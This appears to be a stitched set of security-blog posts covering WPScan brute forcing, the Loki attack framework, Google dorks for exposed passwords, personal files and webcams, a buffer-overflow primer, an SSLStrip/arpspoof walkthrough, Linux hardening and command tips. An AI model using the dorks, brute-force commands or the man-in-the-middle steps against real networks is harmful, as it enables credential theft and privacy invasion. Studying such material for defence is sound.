2. ruby wpscan.rb –url www.example.com –wordlist darkc0de.lst –threads 50
3. ruby wpscan.rb –url www.example.com –wordlist darkc0de.lst –username admin

It uses two files – wp_vulns.xml and plugin_vulns.xml, that simply contain vulnerabilities associated with WordPress plugins and affected versions. This has been compiled from many public sources. If you happen to know of a few exploits that are not public, you could even add them to these files and extend the use of WPScan! It also includes a WordPress bruteforcer – bruter.rb

Download WPScan (wpscan.rb) here - SVN checkout.

sharing from www.pentestit.com

Loki: An Open Source Layer 3 Packet Generating and Attacking Python Framework!

When we speak of layer 3, the Network Layer, a very few tools have the power or the capability to support all the support protocols for packet generation and attack. To name a few, we have tools like Cain & Abel, Scapy, Yersinia and HPING. Yersinia and Scapy being our favourites, they need a bit of knowledge before being set up. Enter Loki, a Python based GUI framework implementing many packet generation and attack modules for Layer 3 protocols!

Loki was released by security researchers for the Germany based ERNW GmbH at BlackHat USA 2010. It includes a GUI that has been programmed in GTK/GLADE and lots of protocols that none of the other tools have implemented yet! To be precise, the following protocols are supported:

ARP
HSRP, HSRPv2
RIP
BGP
OSPF
EIGRP [not-yet-to-be-released due to legal blur]
WLCCP [not-yet-to-be-released due to legal blur]
VRRP, VRRPv3
BFD
LDP
MPLS (re-labeling, tunnel interface)

Based on the above mentioned protocols, it supports the following attacks:

ARP:
Arp spoofing
Arp scanning
Arp flooding
BFD:
DoS of existing BFD session
BGP:
NLRI injection
EIGRP:
EIGRP TLV injection
Authenticated / Unauthenticated DoS
HSRP, HSRPv2:
IP address take-over
LDP:
Injection of label mapping messages
MPLS:
Rewrite of MPLS labels
MPLS-VPN enabled network stack
OSPF:
Injection of LSAs
MD5 authentication cracking
RIP:
Route injection
TCP-MD5:
RFC2385 authentication cracking
VRRP, VRRPv3:
IP Address take-over
WLCCP:
Winning the WDS master election
Sniffing and cracking of infrastructure authentication (asleap)
Sniffing and generating of CTK nonce and key
Sniffing and decryption of client PMK
It replicates some of the functionality of Yersinia and Scapy, but does so in a much more useful package while adding support for lots of new protocols commonly found in enterprise networks. It allows you to manipulate network protocols for man-in-the-middle attacks. Actually, it is a GUI for a lot many tools such as mplstun.

Loki requires that you have the following versions of softwares installed:

python v2.6.5
pygobject v2.20.0
pygtk v2.16.0
libglade v2.6.4
dnet v1.11
pylibpcap v0.5.1
dpkt v1.6
ipy v0.70, 0.64

Download Loki v0.2.4 (loki.py) here.

7 Best Linux Server Security Tips

Linux seems to be the most secure and powerful server, but remember nothing is secure in the world you have to make the thing secure, if you are running Linux server and not patched it than it may be compromise so the point is that an administrator should make the box secure from hackers (crackers). There are different level of security like application layer security means web application security like SQL-Injection, XSS.

Application layer security is not the point of this article, in this article I will discuss Linux server hardening security tips.

Use Strong Passwords
I consider that you have an idea about the importance of passwords and password based attack, so use strong password that has upper and lower case alphabet, numbers and special characters, try to make the password policy strict.

Use Cryptography
Cryptography the art of secrete communication, all the data that goes through network may be sniffed so use encryption technique to secure your data. Use OpenVPN is a cost-effective, lightweight SSL VPN. Use scp, ssh, rsync, or sftp for file transfer.

Avoid Remote Log Ins
As mentioned on the previous tip that data goes on the network may be captured, services like FTP, Telnet, and different file transfer protocols may be compromised so avoid using these services by a remote location if you need to use these services than you must use secure channel like use OpenSSH, FTPS etc.

Patched Management
here are different exploits available for different software(s) and services, so make sure to follow the patch management strategy to keep update your Linux kernel and all the software's and services running on that server. Keep up to date your OS to secure the Linux, if you have a question like why patch management and about patch management policies than follow the link to learn.

Use Intrusion Detection Systems
Firewalls has different limitation so use intrusion detection systems (IDS), you must be configure both network IDS (NIDS) and host IDS (HIDS) to protect the attacks like DOS,port scanning etc. We have discussed about IDS in different articles with detail click here to learn.

Use Linux Security Extensions
To secure the Linux kernel is the key point to secure the Linux server, there are various security packages available to provide the additional security to Linux kernel, try to use the software's like SELinux, AppArmor or GRSecurity.

Use Log Management
Use a strong log management policy to keep an eye on the changes and errors, beside Linux built in log management files there are different software's that provides auditing and log management policies.

Recommended reading: 20 Linux Server Hardening Security Tips
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.

Google Hacking Part 2

s in the first part arbu posted about the basic of google hacking in this part i m just going to put some of the basic important google dork only that a hacker used.

This article is only for educational purpose so if any one misuse it that will not be my responsibility or this blog responsibility

Google queries for locating various Web servers

“Apache/1.3.28 Server at” intitle:index.of

Apache 1.3.28

“Apache/2.0 Server at” intitle:index.of

Apache 2.0

“Apache/* Server at” intitle:index.of

any version of Apache

“Microsoft-IIS/4.0 Server at” intitle:index.of

Microsoft Internet Information Services 4.0

“Microsoft-IIS/5.0 Server at” intitle:index.of

Microsoft Internet Information Services 5.0

“Microsoft-IIS/6.0 Server at” intitle:index.of

Microsoft Internet Information Services 6.0

“Microsoft-IIS/* Server at” intitle:index.of

any version of Microsoft Internet Information Services

“Oracle HTTP Server/* Server at” intitle:index.of

any version of Oracle HTTP Server

“IBM _ HTTP _ Server/* * Server at” intitle:index.of

any version of IBM HTTP Server

“Netscape/* Server at” intitle:index.of

any version of Netscape Server

“Red Hat Secure/*” intitle:index.of

any version of the Red Hat Secure server

“HP Apache-based Web Server/*” intitle:index.of

any version of the HP server
Queries for discovering standard post-installation

intitle:”Test Page for Apache Installation” “You are free”

Apache 1.2.6

intitle:”Test Page for Apache Installation” “It worked!” “this Web site!”

Apache 1.3.0 – 1.3.9

intitle:”Test Page for Apache Installation” “Seeing this instead”

Apache 1.3.11 – 1.3.33, 2.0

intitle:”Test Page for the SSL/TLS-aware Apache Installation” “Hey, it worked!”

Apache SSL/TLS

intitle:”Test Page for the Apache Web Server on Red Hat Linux”

Apache on Red Hat

intitle:”Test Page for the Apache Http Server on Fedora Core”

Apache on Fedora

intitle:”Welcome to Your New Home Page!”

Debian Apache on Debian

intitle:”Welcome to IIS 4.0!”

IIS 4.0

intitle:”Welcome to Windows 2000 Internet Services”

IIS 5.0

intitle:”Welcome to Windows XP Server Internet Services”

IIS 6.0
Querying for application-generated system reports

“Generated by phpSystem”


operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points

“This summary was generated by wwwstat”

web server statistics, system file structure

“These statistics were produced by getstats”

web server statistics, system file structure

“This report was generated by WebLog”

web server statistics, system file structure

intext:”Tobias Oetiker” “traffic analysis”

system performance statistics as MRTG charts, network configuration

intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)

server version, operating system type, child process list, current connections

intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”

web server activity, lots of visitor information

intitle:”Multimon UPS status page”

UPS device performance statistics

intitle:”statistics of” “advanced web statistics”

web server statistics, visitor information

intitle:”System Statistics” +”System and Network Information Center”


system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”

web server statistics, visitor information, system file structure

intitle:”Web Server Statistics for ****”

web server statistics, visitor information

nurl:”/axs/ax-admin.pl” -script

web server statistics, visitor information

inurl:”/cricket/grapher.cgi”

MRTG charts of network interface performance

inurl:server-info “Apache Server Information”

web server version and configuration, operating system type, system file structure

“Output produced by SysWatch *”

operating system type and version, logged users, free memory and disk space, mount points, running processes, system logs

sql injection dorks

allinurl: \”index php go buy\”
allinurl: \”index.php?go=sell\”
allinurl: \”index php go linkdir\”
allinurl: \”index.php?go=resource_center\”
allinurl: \”resource_center.html\”
allinurl: \”index.php?go=properties\”
allinurl: \”index.php?go=register\”
dork for finding admin page

admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp

admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php

admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
Error message queries

“A syntax error has occurred”filetype:ihtml

Informix database errors, potentially containing function names, filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”

authorisation errors, potentially containing user names, function names, file structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”

access-related PHP errors, potentially containing filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”

Oracle database errors, potentially containing filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml

Cocoon errors, potentially containing Cocoon version information, filenames, function names and file structure information

“Invision Power Board Database Error”


Invision Power Board bulletin board errors, potentially containing function names, filenames, file structure information and piece of SQL code

“Warning: mysql _ query()” “invalid query”

MySQL database errors, potentially containing user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”


CGI script errors, potentially containing information about operating system and program versions, user names, filenames and file structure information

“#mysql dump” filetype:sql

MySQL database errors, potentially containing information about database structure and contents
Dork for locating passwords

http://*:*@www” site

passwords for site, stored as the string “http://username:password@www…”

filetype:bak inurl:”htaccess|passwd|shadow|ht users”

file backups, potentially containing user names and passwords

filetype:mdb inurl:”account|users|admin|admin istrators|passwd|password”

mdb files, potentially containing password information

intitle:”Index of” pwd.db

pwd.db files, potentially containing user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of

directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS _ FTP.ini”

filetype:ini WS _ FTP PWD

WS_FTP configuration files, potentially containing FTP server access passwords

ext:pwd inurl:(service|authors|administrators |users) “# -FrontPage-”

files containing Microsoft FrontPage passwords

filetype:sql (“passwd values ****” | “password values ****” | “pass values ****” )

files containing SQL code and passwords inserted into a database

intitle:index.of trillian.ini

configuration files for the Trillian IM

eggdrop filetype:user

user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf

configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password”

configuration files for WV Dial

ext:ini eudora.ini

configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb

Microsoft Access files, potentially containing user account information
Searching for personal data and confidential documents

filetype:xls inurl:”email.xls”

email.xls files, potentially containing contact information

“phone * * *” “address *” “e-mail” intitle: “curriculum vitae”

CVs

“not for distribution”


confidential documents containing the confidential clause

buddylist.blt

AIM contacts list

intitle:index.of mystuff.xml

Trillian IM contacts list

filetype:ctt “msn”

MSN contacts list

filetype:QDF


QDF database files for the Quicken financial application

intitle:index.of finances.xls

finances.xls files, potentially containing information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size

maillog files, potentially containing e-mail

Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”

reports for network security scans, penetration tests etc
dork for locating network devices

“Copyright (c) Tektronix, Inc.” “printer status”

PhaserLink printers

inurl:”printer/main.html” intext:”settings”

Brother HL printers

intitle:”Dell Laser Printer” ews

Dell printers with EWS technology

intext:centreware inurl:status

Xerox Phaser 4500/6250/8200/8400 printers

inurl:hp/device/this.LCDispatcher

HP printers

intitle:liveapplet inurl:LvAppl

Canon Webview webcams

intitle:”EvoCam” inurl:”webcam.html”

Evocam webcams

inurl:”ViewerFrame?Mode


Panasonic Network Camera webcams

(intext:”MOBOTIX M1″ | intext:”MOBOTIX M10″) intext:”Open Menu” Shift-Reload

Mobotix webcams

inurl:indexFrame.shtml Axis

Axis webcams
ntitle:”my webcamXP server!” inurl:”:8080″

webcams accessible via WebcamXP Server

allintitle:Brains, Corp.

camera webcams accessible via mmEye

intitle:”active webcam page”

USB webcams

Buffer Over Flow Attack

If you are reading this post then you definitely have some idea about computer programming and process, A computer program executes various processes and goes on balancing equations for which it has been created.

In the new era of programming we generally see that companies recruit only those programmers which are efficient in programming. Now a days its not a scenario that only the objective of your program is fulfilled. The Code Efficiency is also taken into account. Where Code Efficiency is determined on a series of situations (depending upon the objective of your program).

Buffer overflow attack is an example of exploiting the vulnerability of an inefficient programming. So we see a lot of inefficient programmers who are responsible for the server crashes.

To introduce buffer overflow to a newbie i would say that its a condition when a process or a program attempts to store data beyond the fixed-length temporary memory better known as buffer.

It is generally accepted that the best solution to buffer overflow attacks is to fix the defective programs. However, fixing defective program requires an indepth knowledge of programming.

A buffer is a contiguous allocated chunk of memory, such as an array or a pointer in C. In C and C++, there are no automatic bounds checking on the buffer, which means a user can write past a buffer.

For example:

int main () {
int buffer[10];
buffer[20] = 10;
}

The above C program is a valid program, and every compiler can compile it without any errors. However, the program attempts to write beyond the allocated memory for the buffer, which might result in unexpected behavior. Over the years, some bright people have used only this concept to create havoc in the computer industry. Before we understand how they did it, let’s first see what a process looks like in memory.

A process is a program in execution. An executable program on a disk contains a set of binary instructions to be executed by the processor; some read-only data, such as printf format strings; global and static data that lasts throughout the program execution; and a brk pointer that keeps track of the malloced memory. Function local variables are automatic variables created on the stack whenever functions execute, and they are cleaned up as the function terminates.( you can read about the “process” in depth from WIKI I am not going too much in detail about this)

In memory layout of a Linux process.

A process starts with the program’s code and data. Code and data consists of the program’s instructions and the initialized and uninitialized static and global data, respectively. After that is the run-time heap (created using malloc/calloc), and then at the top is the users stack. This stack is used whenever a function call is made.



image credits to Linux Journal)

Another Example to Illustrate this.

void function (char *str) {
char buffer[16];
strcpy (buffer, str);
}
int main () {
char *str = “Hi My name is saurabh tiwari”; // length of str = 29 bytes
function (str);
}

This program is guaranteed to cause unexpected behavior, because a string (str) of 29 bytes has been copied to a location (buffer) that has been allocated for only 16 bytes. The extra bytes run past the buffer and overwrites the space allocated for the FP(FP is functions return address), return address and so on. This, in turn, corrupts the process stack. The function used to copy the string is strcpy, which completes no checking of bounds. Using strncpy would have prevented this corruption of the stack. However, this classic example shows that a buffer overflow can overwrite a function’s return address, which in turn can alter the program’s execution path. Recall that a function’s return address is the address of the next instruction in memory, which is executed immediately after the function returns.

How to implement the above example – (source- Sandeep Grover)

Because we know it is easy to overwrite a function’s return address, an intelligent hacker might want to spawn a shell (with root permissions) by jumping the execution path to such code. But, what if there is no such code in the program to be exploited? The answer is to place the code we are trying to execute in the buffer’s overflowing area. We then overwrite the return address so it points back to the buffer and executes the intended code. Such code can be inserted into the program using environment variables or program input parameters.

I will be covering the shell program on the implementation of Buffer overflow attack in my next post.

Till then happy hacking.

SSL Hijacking

It discusses the weakness in the SSL certificate signing request which gets exploited for making fake certificates. Finally, the article shows how to run the SSLStrip tool on Windows and hijack the SSL successfully.

What is SSLStrip
The SSLStrip works by watching http traffic, then by acting as a proxy when a user attempts to initiate
an https session. While the user believes the secure session has been initiated, and SSLStrip has connected to the secure server via https, all traffic between the user and SSLStrip is http. The SSLStrip replaces all links with https:// in the page with http://. Warnings usually displayed by the browser don’t appear and the session appears normal to the end-user. Login details can then be harvested. The author of the tool Moxie Marlinspike says: This tool provides a demonstration of the HTTPS stripping attacks that were presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for
HTTPS links and redirects, and then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. An https padlock logo can be spoofed in the URL bar, to further lull the user into a false sense of security. While SSL is generally accepted as being secure, security researchers have claimed SSL communications can be intercepted. Researcher Mike Perry said he had been in discussions with Google regarding an exploit he planned to release, which would allow a hacker to intercept a user’s communications with supposedly secure websites over an unsecured Wi-Fi network.

Weakness of SSL in practice
The main weakness with conventional SSL certificates is that there are no standards for their issuance, nor any rules for what the fields in them are supposed to mean and which are required for authentication.
Marlinspike’s SSLStrip attack demonstrated the combination of several attack techniques to exploit
the above weaknesses and fool users/client applications into thinking they were using a trusted site/server, when in fact they were using a fake version of that site/server. He combined a number
of techniques; including man-in-the-middle, fake leaf node certificates and the null character attack.
SSL heavily rely on X509 certificate structure to prove authenticity. For the SSL it is the common
name field of the X509 certificate that is used to identify authentic servers. For example, Paypal will
use www.paypal.com in the common name field. The signing process heavily relies on the above
convention. The Certificate Authorities will sign www.paypal.com, they don’t care whether you are

requesting for anything.paypal.com or something.any thing.paypal.com – as long as you prove that you are paypal.com. X509 certificates are commonly formatted using ASN.1 notation. ASN.1 supports many string types but all of them are represented as some variations of PASCAL. In PASCAL character string the NULL characters are treated as normal characters. They don’t have any special meaning.So NULL characters can be included into the common name field of X509 certificates. So a signing request like
www.paypal.com.fakeorganization.com will be treated valid. The Certificate Authority will ignore prefix and sign the root domain fakeorganization.com. Now the thing is most contemporary SSL/TLS
implementation treat the field in X509 as C strings. And in C ” (NULL) means end of the string. So www.paypal.com.fakeorganization.com and www.paypal.com will be treated as identical. Thus the owner of the certificate for www.paypal.com\ 0.fakeorganization.com can successfully present his
certificate to the connections intended for original www.paypal.com.Here MITM happens on SSL.You can sign your own certificates using the valid certificate you got from Certificate Authority. Actually there is field in X509 certificates which needs to be set FALSE in order to restrict domain owner to act
as a Certificate Authority.Most CA’s didn’t explicitly set basicConstraints: CA=FALSE A lot of web browsers and other SSL implementations didn’t bother to check it, whether the field was there or not. Anyone with a valid leaf node certificate could create and sign a leaf node certificate for any other
domain The blueanarchy.org can create a valid certificate as paypal.com and use it.

How SSLStrip works
• It does an MITM (Man-In-The-Middle) on the HTTP connection.
• It replaces all the HTTPS links with HTTP ones but remembers the links which were changed.
• Communicates with the victim client on an HTTP connection for any secure link.
• Communicates with the legitimate server over HTTPS for the same secure link.
• Communication is transparently proxied between the victim client and the legitimate server.
• Images such as the favicon are replaced by imagesof the familiar secure lock icon, to build trust.

As the MITM is taking places all passwords, credentials etc are stolen without the Client knowing.
Performing the Hijack on Windows
The process of using SSLStrip on Windows machine is almost similar to Linux machine. Linux has Firewall management tool iptables for enabling Port Forwarding. The port forwarding utility actually accepts traffic on one port of the machine and redirects to another port on the same machine. Windows machine doesn’t have any inbuilt mechanism for port forwarding. There are mainly fours steps to perform the experiment:
• Turn your machine into IP forwarding mode.
• Setup iptables to redirect HTTP traffic to sslstrip.
• Run sslstrip.
• Run arpspoof to convince a network they should
send their traffic via your machine.
Prerequisite: Install Python as SSLStrip is a Python based tool. You need two machines running Windows
on same LAN- one for attacker, another for victim. Attacker’s machine is the machine where the SSLStrip runs. Also this is the machine where you will run the arpspoof command to spoof the traffic from Vitim machine. The port forwarding utility needs to be run on this machine as well.
Step 1:
Enable IP forwarding on Attacker’s Machine
Get the hacker machine into acting as a router as it needs to forward all the traffic coming to it to outside
internet.
• Start Registry Editor (Regedit.exe).
• In Registry Editor, locate the following registry key:
• HK EY _ LOCA L _ M ACHIN E\SYSTEM\CurrentControlSet\ Services\Tcpip\Parameters
• Set the following registry value:
• Value Name: IPEnableRouter
• Value type: REG _ DWORD
• Value Data: 1
• A value of 1 enables TCP/IP forwarding for all
network connections that are installed and used by
this computer.
• Quit Registry Editor. Restart the PC.
Step 2:
Set a firewall rule that forwards HTTP traffic from the victim to hacker’s machine for modification
This was most challenging and time consuming part of the experiment as I was unable to find single command, tool or utilities to do that. In Unix the an IPtables command would do thatsudo iptables -t nat -A PREROUTING -p tcp –destinationport 80 -j REDIRECT –to-port 10000 It tells all HTTP traffic from victim, coming on port 80 of hacker’s machine to redirect it on port 10000 on the same hacker’s machine. Port 10000 is used by SSLStrip tool by default. Tired of not finding any equivalent firewall utility for Windows to perform above rule fortunately I stumbled upon blog of Kenneth Xu (http://kennethxu.blogspot.com) and I finally found the following nice Java based TCP/IP port forwarding utility – (Download here http://code.google.com/p/portforward/downloads/list)
C:\>java -classpath commons-logging.jar;portforward.jar
org.enterprisepower.net.portforward.
Forwarder 80 localhost:10000
This command forwards all HTTP traffic received on port 80 of Hacker’s machine to port 10000 of the same machine. SSLStrip runs on port 10000 by default.
Step 3:
ARP spoof the target traffic to redirect to hacker’s
machine
Suppose the Victim machine’s IP is 192.168.1.10 and IP of the gateway is 192.168.1.1. It will poison the victim machine (192.168.1.10) MAC table and instead of sending the traffic to Gateway (192.168.1.1) it will send to the hacker’s machine falsely assuming it as the real gateway. Run the following command on attacker’s machine arpspoof –t 192.168.1.10 192.168.1.1 It will update the ARP table on Vitim’s machine with
changed gateway IP of attacker’s machine.
Step 4:
Run SSLStrip on hacker’s machine
Run the following command on Hacker’s machine python sslstrip.py -f lock.ico You can see the log file in the SSLStrip installation folder for logged credentials. The SSLStrip will log all the traffic coming from
Victim’s machine and strips the all the SSL link (https://) to http:// between the Victim and Hacker. Thus the traffic between the Victim to Hacker is transparent and in clear text Various options available with the SSLStrip:
Options:
• w , –write= Specify file to log to
(o
• p, –post Log only SSL POSTs. (default)
• s, –ssl Log all SSL traffic to and server
• a, –all Log all SSL and HTTP traffic to and from
server
• l , –listen= Port to listen on (default
10000)
• f, –favicon Substitute a lock favicon
• k, –killsessions Kill sessions in progress
• h Print this help message.

Real life examples
The following page appears on https:// in normal situation but here it is as http:// View page source can also reveal that links are stripped of SSL: see Gmail on http: see An example of Log file of SSLStrip,

Mitigation
User Education: User should be educated to always use https while requesting any sensitive page. As user only type domain.com that is redirected to https://domain.com may be vulnerable to SSLStrip.
EV SSL Certificates: There is no reliable information to back up the authentication of the domain name. To address this critical problem, certificate authorities and software companies joined to form the CA/Browser Forum and promulgate a new standard called EV SSL for Extended Validation SSL. For instance, they must validate that the organization exists as a legal entity, that any organization names are legal names for that organization, and that the applicant is authorized to apply for the certificate.
SSLStrip tool:

http://www.thoughtcrime.org/software/sslstrip/

NULL Prefix attack on SSL Certificates:

http://www.thoughtcrime.org/papers/null-prefix-attacks.pdf

Black Hat presentation:

http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

(Topic is same as read in Hacking magazine June 2010 issue)

Starting & Stopping

shutdown -h now Shutdown the system now and do not
reboot
halt Stop all processes – same as above

shutdown -r 5 Shutdown the system in 5 minutes and
reboot

shutdown -r now Shutdown the system now and reboot
reboot Stop all processes and then reboot – same
as above

startx Start the X system

Accessing & mounting file systems

mount -t iso9660 /dev/cdrom/mnt/cdrom Mount the device cdrom and call it cdrom under the /mnt directory
mount -t msdos /dev/hdd/mnt/ddrive Mount hard disk “d” as a msdos file system and call it ddrive under the /mnt directory

mount -t vfat /dev/hda1/mnt/cdrive Mount hard disk “a” as a VFAT file system and call it cdrive under the /mnt directory

umount /mnt/cdrom Unmount the cdrom

Finding files and text within files

find / -name fname Starting with the root directory, look for the file called fname

find / -name ”*fname*” Starting with the root directory, look for the file containing the string fname

locate missingfilename Find a file called missingfilename using the locate command – this assumes you have already used the command updatedb

updatedb Create or update the database of files on all file systems attached to the linux root directory

which missingfilename Show the subdirectory containing the executable file called missingfilename

grep textstringtofind/dir Starting with the directory called dir , look for and list all files containing textstringtofind

The X Window System

xvidtune Run the X graphics tuning utility
XF86Setup Run the X configuration menu with automatic probing of graphics cards
Xconfigurator Run another X configuration menu with automatic probing of graphics cards
xf86config Run a text based X configuration menu

Moving, copying, deleting & viewing files

ls -l List files in current directory using long format
ls -F List files in current directory and indicate the file type
ls -laC List all files in current directory in long format and display in columns

rm name Remove a file or directory called name
rm -rf name Kill off an entire directory and all it’s includes files and subdirectories
cp filename/home/dirname Copy the file called filename to the /home/dirname directory
mv filename/home/dirname Move the file called filename to the /home/dirname directory
cat filetoview Display the file called filetoview
man -k keyword Display man pages containing keyword
morefiletoview Display the file called filetoview one page at a time, proceed to next page using the spacebar
head filetoview Display the first 10 lines of the file called filetoview
head -20 filetoview Display the first 20 lines of the file called filetoview
tail filetoview Display the last 10 lines of the file called filetoview
tail -20 filetoview Display the last 20 lines of the file called filetoview

Installing software

rpm -ihv name.rpm Install the rpm package called name
rpm -Uhv name.rpm Upgrade the rpm package called name
rpm -e package Delete the rpm package called package
rpm -l package List the files in the package called package
rpm -ql package List the files and state the installed version of the package called package
rpm -i –force package Reinstall the rpm package called name having deleted parts of it (not deleting using rpm -e)
tar -zxvf archive.tar.gz or tar -zxvf archive.tgz Decompress the files contained in the zipped and tarred archive called archive
./configure Execute the script preparing the installed files for compiling

User Administration

adduser accountname Create a new user call accountname
passwd accountname Give accountname a new password

su Log in as superuser from current login
exit Stop being superuser and revert tonormal user

X Shortcuts – (mainly for Redhat)

Control|Alt + or - Increase or decrease the screen resolution. eg. from 640×480 to 800×600
Alt | escape Display list of active windows
Shift|Control F8 Resize the selected window
Right click on desktop background Display menu
Shift|Control Altr Refresh the screen
Shift|Control Altx Start an xterm session
Printing

/etc/rc.d/init.d/lpd start Start the print daemon
/etc/rc.d/init.d/lpd stop Stop the print daemon
/etc/rc.d/init.d/lpd status Display status of the print daemon
lpq Display jobs in print queue
lprm Remove jobs from queue
lpr Print a file
lpc Printer control tool
man subject | lpr Print the manual page called subject as plain text
man -t subject | lpr Print the manual page called subject as Postscript output
printtool Start X printer setup interface

Some More

ifconfig List ip addresses for all devices on the machine
apropos subject List manual pages for subject
usermount Executes graphical application for mounting and unmounting file systems

Incident Analyser: A Remote Malware Outbreak Analyser

second submission received via the PenTestIT Submit Your Tool. This is a submission by Mr. Beenu Arora who had previously submitted the Malware Analyser. Back to this tool – Incident Analyser is a freeware tool for responding to malware outbreak in an environment. The tool can be helpful in identifying the infected/suspected hosts in a large network.



The tool can perform the following tasks on list of IPs on a network:
Dumping list of active connections of a node.
Fetching list of network interfaces.
Dumping information of the running processes.
Fetching start-up items list along with actual files path.

Using this tool is very simple. It takes just one argument. Just see to it that you have the proper privileges and authorization credentials to do so.

1
IAnalyser
Download Incident Analyser v1.0 (Ianalyser.zip) here.